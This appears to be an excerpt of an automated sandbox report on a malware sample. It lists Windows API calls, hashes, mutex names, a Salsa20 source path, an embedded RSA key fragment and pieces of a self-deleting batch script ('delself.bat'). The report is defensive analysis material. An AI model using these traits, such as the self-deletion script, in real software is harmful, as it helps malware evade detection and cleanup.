                                                                                                  • Instruction Fuzzy Hash: A5E0C2311043006AD32197A4CC01B86BBC49F28724F00C81EE68A6BA81C5A1B00887A9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_0001FD80,?,00000000,00599230), ref: 0048FDD6
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CreateThread
                                                                                                  • String ID:
                                                                                                  • API String ID: 2422867632-0
                                                                                                  • Opcode ID: ab23c176ede3c1aaba52214db8a9e4100dade2b495d700d44f60c09488a62738
                                                                                                  • Instruction ID: 7d500f83498b05deb035f5490b214f6fcd817dd1beeaaa39260c511b4ed031ca
                                                                                                  • Opcode Fuzzy Hash: ab23c176ede3c1aaba52214db8a9e4100dade2b495d700d44f60c09488a62738
                                                                                                  • Instruction Fuzzy Hash: BCD0C97538930577EB041BA9AC07F493A98D728F00F50402AB605E91D0DAA1A414BA5C
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __fsopen
                                                                                                  • String ID:
                                                                                                  • API String ID: 3646066109-0
                                                                                                  • Opcode ID: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                  • Instruction ID: 60d465ff72c355d4b6aa24ed944d7b42274a03bc68a14c28e410993911ef3c3e
                                                                                                  • Opcode Fuzzy Hash: bf5cddf6cdcf292e93ea6723c994e088edc5db0ae513d1c80474abae1941b879
                                                                                                  • Instruction Fuzzy Hash: 17B0927248020C77CF012E82EC02A493F199B50764F448021FB0C18271E6BBE6649689
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _doexit.LIBCMT ref: 00497F47
                                                                                                    • Part of subcall function 00497E0E: __lock.LIBCMT ref: 00497E1C
                                                                                                    • Part of subcall function 00497E0E: DecodePointer.KERNEL32(00577B08,0000001C,00497CFB,00000000,00000001,00000000,?,00497C49,000000FF,?,00498B1A,00000011,00000000,?,004950D7,0000000D), ref: 00497E5B
                                                                                                    • Part of subcall function 00497E0E: DecodePointer.KERNEL32(?,00497C49,000000FF,?,00498B1A,00000011,00000000,?,004950D7,0000000D), ref: 00497E6C
                                                                                                    • Part of subcall function 00497E0E: EncodePointer.KERNEL32(00000000,?,00497C49,000000FF,?,00498B1A,00000011,00000000,?,004950D7,0000000D), ref: 00497E85
                                                                                                    • Part of subcall function 00497E0E: DecodePointer.KERNEL32(-00000004,?,00497C49,000000FF,?,00498B1A,00000011,00000000,?,004950D7,0000000D), ref: 00497E95
                                                                                                    • Part of subcall function 00497E0E: EncodePointer.KERNEL32(00000000,?,00497C49,000000FF,?,00498B1A,00000011,00000000,?,004950D7,0000000D), ref: 00497E9B
                                                                                                    • Part of subcall function 00497E0E: DecodePointer.KERNEL32(?,00497C49,000000FF,?,00498B1A,00000011,00000000,?,004950D7,0000000D), ref: 00497EB1
                                                                                                    • Part of subcall function 00497E0E: DecodePointer.KERNEL32(?,00497C49,000000FF,?,00498B1A,00000011,00000000,?,004950D7,0000000D), ref: 00497EBC
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Pointer$Decode$Encode$__lock_doexit
                                                                                                  • String ID:
                                                                                                  • API String ID: 2158581194-0
                                                                                                  • Opcode ID: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                  • Instruction ID: 1871a2ee2d164ca76feab61da9219b4b767679b9976d6ffa90f906164473caa4
                                                                                                  • Opcode Fuzzy Hash: e664eab0a2f8ce3703c552baf369986a84cdf03d3e0bf670d1975cdb5f15a4fc
                                                                                                  • Instruction Fuzzy Hash: 53B0127198830C33DE113642EC03F053F0C4740F54F200071FA0C1C5E1A593B96041CD
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __wfsopen
                                                                                                  • String ID:
                                                                                                  • API String ID: 197181222-0
                                                                                                  • Opcode ID: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                  • Instruction ID: 62051d3fb57a3877c6d50556c599a39dd4c20ca03c308eb1c25b539e64f90c49
                                                                                                  • Opcode Fuzzy Hash: a3c3897a0b8e5cc1e99c40f009d05ddfac5da0d01180f44d34b11c30565e0d74
                                                                                                  • Instruction Fuzzy Hash: 9FB0927244020C77CE012A82EC02A493F199B416A4F008021FB0C18571A677A6A19A89
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000010,-000003FF,-000003FF), ref: 00482966
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: ByteCharMultiWide
                                                                                                  • String ID:
                                                                                                  • API String ID: 626452242-0
                                                                                                  • Opcode ID: 7f22f7b896dcfc7c09303c653cca6570a1beb83229df60c2f171e7c589748efc
                                                                                                  • Instruction ID: 07981853f850754929fc4db830d5fc1baa1ccca7fd2107f26ce073f046c6049d
                                                                                                  • Opcode Fuzzy Hash: 7f22f7b896dcfc7c09303c653cca6570a1beb83229df60c2f171e7c589748efc
                                                                                                  • Instruction Fuzzy Hash: 0A11D371A00219EBDF01DF59CC41BDFBBA8EF05724F00452AF819A7281D7BA9915CBD6
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • _wcscmp.LIBCMT ref: 004A82B9
                                                                                                  • _wcscmp.LIBCMT ref: 004A82CA
                                                                                                  • GetLocaleInfoW.KERNEL32(?,2000000B,?,00000002,?,?,004A8568,?,00000000), ref: 004A82E6
                                                                                                  • GetLocaleInfoW.KERNEL32(?,20001004,?,00000002,?,?,004A8568,?,00000000), ref: 004A8310
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: InfoLocale_wcscmp
                                                                                                  • String ID: ACP$OCP
                                                                                                  • API String ID: 1351282208-711371036
                                                                                                  • Opcode ID: 8a91af66d975871898e70baf55a3da122411d1819bc29f59aa3d5fa3f280c36f
                                                                                                  • Instruction ID: e7a501c06d6f38411e8e12a5007fd6cb15119fc5e82e8b5a1776d55951a4fedb
                                                                                                  • Opcode Fuzzy Hash: 8a91af66d975871898e70baf55a3da122411d1819bc29f59aa3d5fa3f280c36f
                                                                                                  • Instruction Fuzzy Hash: 4001C432205515AADB205E58DC05FE63B98EF26B54F00805BF904DA192EF74DE50D7CC
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • p2X, xrefs: 00489EE2
                                                                                                  • -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU, xrefs: 00489EC4
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: _memset
                                                                                                  • String ID: -----BEGIN PUBLIC KEY-----\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEA50iTgpK4WqHRCxsCP+Ko\\ni6Rfb9WWM4K\/vgKVvZi\/+pA7wR6QvFBU$p2X
                                                                                                  • API String ID: 2102423945-3900825659
                                                                                                  • Opcode ID: 07eee251a7d842568bee3f168efc3c1b41b8f8816eab388d2c5059023626a7c0
                                                                                                  • Instruction ID: d2d9019a35bc8217825cfdd918ec7ae3a457105aff6b738427e2ac1e4c4b4900
                                                                                                  • Opcode Fuzzy Hash: 07eee251a7d842568bee3f168efc3c1b41b8f8816eab388d2c5059023626a7c0
                                                                                                  • Instruction Fuzzy Hash: 95F0323828874065FB10A7A4BC0BB193E81A334F08F00105EE9093A2E2D3ED224CB3DE
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  Strings
                                                                                                  • e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl, xrefs: 0047C090
                                                                                                  • input != nullptr && output != nullptr, xrefs: 0047C095
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: __wassert
                                                                                                  • String ID: e:\doc\my work (c++)\_git\encryption\encryptionwinapi\Salsa20.inl$input != nullptr && output != nullptr
                                                                                                  • API String ID: 3993402318-1975116136
                                                                                                  • Opcode ID: a1e6955c3bac63fd2a5521ecba37a32b655c7dce2b4e34ee3b9decedd0e75dc4
                                                                                                  • Instruction ID: 2e0ed54e858e52a34cda404f7995165094f4c215b2e0130fdb349a22dc71c49f
                                                                                                  • Opcode Fuzzy Hash: a1e6955c3bac63fd2a5521ecba37a32b655c7dce2b4e34ee3b9decedd0e75dc4
                                                                                                  • Instruction Fuzzy Hash: C1C18BB5E002499FCB54CFA9C885ADEFBF1FF48304F24856AE919E7301E334AA558B54
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}), ref: 004824FE
                                                                                                  • GetLastError.KERNEL32 ref: 00482509
                                                                                                  • CloseHandle.KERNEL32 ref: 0048251C
                                                                                                  • CloseHandle.KERNEL32 ref: 00482539
                                                                                                  • CreateMutexA.KERNEL32(00000000,00000000,{FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}), ref: 00482550
                                                                                                  • GetLastError.KERNEL32 ref: 0048255B
                                                                                                  • CloseHandle.KERNEL32 ref: 0048256E
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: CloseHandle$CreateErrorLastMutex
                                                                                                  • String ID: "if exist "$" goto try$@echo off:trydel "$D$TEMP$del "$delself.bat${1D6FC66E-D1F3-422C-8A53-C0BBCF3D900D}${FBB4BCC6-05C7-4ADD-B67B-A98A697323C1}
                                                                                                  • API String ID: 2372642624-488272950
                                                                                                  • Opcode ID: 2dab8d5e9d862c8e2e1ed33a915b886aa974a470303a7cc59c167ba59c39cc45
                                                                                                  • Instruction ID: 7bbca1f227a0862fcdbc8f1a1b5f1a0e1f2f54aa821c5b39431cd31cb3a7290f
                                                                                                  • Opcode Fuzzy Hash: 2dab8d5e9d862c8e2e1ed33a915b886aa974a470303a7cc59c167ba59c39cc45
                                                                                                  • Instruction Fuzzy Hash: 4F714F76940218ABDF10ABE0EC89FDE7BACFB54705F004596F609E2190DB759A48DF60
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                  • GetLastError.KERNEL32 ref: 00481915
                                                                                                  • FormatMessageW.KERNEL32(00001300,00000000,?,00000400,?,00000000,00000000), ref: 00481932
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00481941
                                                                                                  • lstrlenW.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00481948
                                                                                                  • LocalAlloc.KERNEL32(00000040,00000000,?,00000400,?,00000000,00000000), ref: 00481956
                                                                                                  • lstrcpyW.KERNEL32(00000000,?), ref: 00481962
                                                                                                  • lstrcatW.KERNEL32(00000000, failed with error ), ref: 00481974
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 0048198B
                                                                                                  • lstrcatW.KERNEL32(00000000,00570260), ref: 00481993
                                                                                                  • lstrcatW.KERNEL32(00000000,?), ref: 00481999
                                                                                                  • lstrlenW.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 004819A3
                                                                                                  • _memset.LIBCMT ref: 004819B8
                                                                                                  • lstrcpynW.KERNEL32(?,00000000,00000400,?,00000400,?,00000000,00000000), ref: 004819DC
                                                                                                    • Part of subcall function 00482BA0: lstrlenW.KERNEL32(?), ref: 00482BC9
                                                                                                  • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000), ref: 00481A01
                                                                                                  • LocalFree.KERNEL32(00000000,?,00000400,?,00000000,00000000), ref: 00481A04
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: lstrcatlstrlen$Local$Free$AllocErrorFormatLastMessage_memsetlstrcpylstrcpyn
                                                                                                  • String ID: failed with error
                                                                                                  • API String ID: 4182478520-946485432
                                                                                                  • Opcode ID: 3b14c23a9f69e579bcb82eefc5bace7146c84723d451c2e2514637303006665b
                                                                                                  • Instruction ID: 1722a50d65cdcf6e46b7e5c9ad20cb9f4428960c960d82dcec4e8998b6e30dc1
                                                                                                  • Opcode Fuzzy Hash: 3b14c23a9f69e579bcb82eefc5bace7146c84723d451c2e2514637303006665b
                                                                                                  • Instruction Fuzzy Hash: 8421F632A40218B7D7117B619C4AF6E3E7CEF85B11F100056FA05B6291DE782E45EBE9
                                                                                                  Uniqueness

                                                                                                  Uniqueness Score: -1.00%

                                                                                                  APIs
                                                                                                    • Part of subcall function 004C49A0: GetModuleHandleA.KERNEL32(FFFFFFFF,?,00000001,?,004C4B72), ref: 004C49C7
                                                                                                    • Part of subcall function 004C49A0: GetProcAddress.KERNEL32(00000000,_OPENSSL_isservice), ref: 004C49D7
                                                                                                    • Part of subcall function 004C49A0: GetDesktopWindow.USER32 ref: 004C49FB
                                                                                                    • Part of subcall function 004C49A0: GetProcessWindowStation.USER32(?,004C4B72), ref: 004C4A01
                                                                                                    • Part of subcall function 004C49A0: GetUserObjectInformationW.USER32(00000000,00000002,00000000,00000000,?,?,004C4B72), ref: 004C4A1C
                                                                                                    • Part of subcall function 004C49A0: GetLastError.KERNEL32(?,004C4B72), ref: 004C4A2A
                                                                                                    • Part of subcall function 004C49A0: GetUserObjectInformationW.USER32(00000000,00000002,?,?,?,?,004C4B72), ref: 004C4A65
                                                                                                    • Part of subcall function 004C49A0: _wcsstr.LIBCMT ref: 004C4A8A
                                                                                                  • CreateDCA.GDI32(DISPLAY,00000000,00000000,00000000), ref: 004F2316
                                                                                                  • CreateCompatibleDC.GDI32(00000000), ref: 004F2323
                                                                                                  • GetDeviceCaps.GDI32(00000000,00000008), ref: 004F2338
                                                                                                  • GetDeviceCaps.GDI32(00000000,0000000A), ref: 004F2341
                                                                                                  • CreateCompatibleBitmap.GDI32(00000000,?,00000010), ref: 004F234E
                                                                                                  • SelectObject.GDI32(00000000,00000000), ref: 004F235C
                                                                                                  • GetObjectA.GDI32(00000000,00000018,?), ref: 004F236E
                                                                                                  • BitBlt.GDI32(?,00000000,00000000,?,00000010,?,00000000,00000000,00CC0020), ref: 004F23CA
                                                                                                  • GetBitmapBits.GDI32(?,?,00000000), ref: 004F23D6
                                                                                                  • SelectObject.GDI32(?,?), ref: 004F2436
                                                                                                  • DeleteObject.GDI32(00000000), ref: 004F243D
                                                                                                  • DeleteDC.GDI32(?), ref: 004F244A
                                                                                                  • DeleteDC.GDI32(?), ref: 004F2450
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000002.00000002.2329665777.0000000000471000.00000020.00000001.01000000.00000003.sdmp, Offset: 00470000, based on PE: true
                                                                                                  • Associated: 00000002.00000002.2329584552.0000000000470000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329772476.000000000053C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329814437.000000000057A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329868261.000000000057C000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000580000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.000000000058A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2329958876.0000000000599000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                  • Associated: 00000002.00000002.2330188918.000000000059B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_2_2_470000_baaf76a5d567125252c32a834369f3658341d8224c4a058275c6760c43d7545b_paylo.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID: Object$CreateDelete$BitmapCapsCompatibleDeviceInformationSelectUserWindow$AddressBitsDesktopErrorHandleLastModuleProcProcessStation_wcsstr
                                                                                                  • String ID: .\crypto\rand\rand_win.c$DISPLAY
                                                                                                  • API String ID: 151064509-1805842116
                                                                                                  • Opcode ID: a284d6acd605e0c04e98947d1982229790e632b1b7468ca0ab0351da8540ecb1
                                                                                                  • Instruction ID: 12ab5f856871c3ed5830ad4687704b835afccae24cf3e0762a85c2e461c89772
